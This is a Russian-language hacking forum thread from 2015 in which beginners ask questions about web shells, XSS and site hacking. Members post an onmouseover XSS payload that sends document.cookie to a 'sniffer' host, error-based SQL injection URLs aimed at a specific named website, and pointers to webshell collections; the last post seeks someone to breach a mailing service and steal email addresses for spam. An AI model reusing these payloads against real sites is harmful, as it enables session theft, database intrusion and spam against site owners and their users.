Задаем вопросы)

Discussion in 'Песочница' started by Arboretum, 10 May 2015.

  1. Arboretum

    Arboretum Member

    Joined:
    8 May 2015
    Messages:
    7
    Likes Received:
    8
    Reputations:
    0
    Наверное многим тут есть что спросить... Спрашиваем тут, знатоки заходят и отвечают. Мой вопрос, существуют ли html шеллы?
     
    vBr likes this.
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    html это не язык программирования
    но отвечая на твой вопрос, да существуют, а ещё я вчера видел мамонта, он бегал по радуге, и отдал мне мою плюшку.
     
    maxic_lo, Федор and Suicide like this.
  3. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Есть ли шеллы на Brainfuck?
     
  4. Alexandr II

    Alexandr II -=ImperatoR=-

    Joined:
    28 Dec 2007
    Messages:
    1,069
    Likes Received:
    671
    Reputations:
    87
    если знаешь ответ, зачем спрашивать? задавай вопрос, который тебя интересует, и будет нормальный ответ
     
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    html шелов нету.
     
    Cthulchu and Arboretum like this.
  6. Cthulchu

    Cthulchu Elder - Старейшина

    Joined:
    22 Nov 2007
    Messages:
    405
    Likes Received:
    721
    Reputations:
    85
    Не надо вводить в заблуждение людей.
    Есть что ответить - ответь. Нету - не отвечай.
    Для того, чтобы стебаться над новичками много ума не надо.

    Епт, как смешно, html-шелл!

    ЗЫ

    формально HTML - это язык программирования.
     
    Arboretum, Chtulhu and yarbabin like this.
  7. tiger_x

    tiger_x New Member

    Joined:
    9 May 2015
    Messages:
    27
    Likes Received:
    2
    Reputations:
    7
    Объясните как использовать xss onmouseover= ?
    Желательно с примером скрипта вытягивания куки внутри onmouseover.
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    примерно так:
    Code:
    onmouseover="(new+Image()).src='//sniffer'%2bdocument.cookie"
     
    _________________________
  9. tiger_x

    tiger_x New Member

    Joined:
    9 May 2015
    Messages:
    27
    Likes Received:
    2
    Reputations:
    7
    Может глупый вопрос. А где сниффер взять?
     
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    в интернете() google.de
     
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://mr.lumbolka.ru/ru/index.php?id=100+and+extractvalue(1,coNCat(0x3a,version()))
    так же пройдет UnIoN, только я вывод не нашел.
     
    _________________________
  13. tiger_x

    tiger_x New Member

    Joined:
    9 May 2015
    Messages:
    27
    Likes Received:
    2
    Reputations:
    7
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Спасибо, такое наверное прокатит, там кодировка сбита, трудно будет искать вывод в исходнике.
    Всё спасибо . Смотри
    Code:
    http://mr.lumbolka.ru/ru/index.php?id=100+and+false+and+extractvalue%281,coNCat%280x3a,version%28%29%29%29+--+%20-
     
  15. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    Увы HTML это не серверный язык а всего лишь язик гипертекстовой разметки...Так сказать визуализация страницы...SHELL-ы есть под те языки на которых работают WEB-сервера.На сегодняшний день мне известны asp aspx cfm jsp perl php - шеллы...Для примера можно заглянуть в /usr/share/webshells если пользуешся Kali Linux..
     
  16. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
  17. vBr

    vBr Banned

    Joined:
    10 May 2015
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Вопрос,
    Можно ли взломать сайт -и сдампить Полностью Шаблон, и движек?
     
    #17 vBr, 11 May 2015
    Last edited: 11 May 2015
  18. Cthulchu

    Cthulchu Elder - Старейшина

    Joined:
    22 Nov 2007
    Messages:
    405
    Likes Received:
    721
    Reputations:
    85
    если в процессе взлома вам какм-либо удалось получить доступ к файловой системе, то да, вы имеете такую возможность.

    Ваш К.О.
     
    vBr and Mister_Bert0ni like this.
  19. vBr

    vBr Banned

    Joined:
    10 May 2015
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Вопрос,
    Раньше FireFox в гугле вобью что нибудь и бегаю по ссылка нажимал левой кнопкой мыши -влкдака открывалась отдельно, сейчас переходит сразу же по ссылки т.е не открывается отдельно, в настройках в Мозиле в разделе Влкдаки все проверил не че не нашел, не обновлял не менял фф, как это исправить? хочу как раньше что бы открывалась сразу новая вкладка,
     
  20. Johnydriver

    Johnydriver New Member

    Joined:
    9 May 2015
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    Есть кто-то к кому можно обратиться чтобы взломал джаст или смарт сервис рассылок и достал оттуда свежые емейл адреса? (не для продажи, а для личного использования - спама)
    Если да, подскажите к кому?
     
Loading...